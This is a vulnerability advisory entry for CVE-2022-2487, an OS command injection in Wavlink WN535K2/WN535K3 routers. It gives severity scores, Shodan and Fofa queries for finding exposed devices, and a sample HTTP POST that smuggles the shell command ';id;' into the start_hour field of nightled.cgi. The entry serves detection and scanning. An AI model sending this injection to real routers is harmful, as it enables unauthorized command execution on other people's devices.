🔙 목록으로 돌아가기

CVE-2022-2487: Wavlink WN535K2/WN535K3 - OS Command Injection

TitleWavlink WN535K2/WN535K3 - OS Command Injection
AuthorFor3stCo1d
SeverityCritical
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.
RemediationApply the latest firmware update provided by the vendor to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.93118
CVE IDCVE-2022-2487
CWE IDCWE-78
Shodan Queryhttp.title:"Wi-Fi APP Login"http.title:"wi-fi app login"
Fofa Querytitle="wi-fi app login"
Tags cve cve2022 iot wavlink router rce oast vkev vuln

🔍 Vulnerability Description

Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection which affects unknown code in /cgi-bin/nightled.cgi via manipulation of the argument start_hour. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.

🌐 HTTP Request

POST /cgi-bin/nightled.cgi HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.1
Connection: close
Content-Length: 30
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

page=night_led&start_hour=;id;

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-2487.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-2487.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A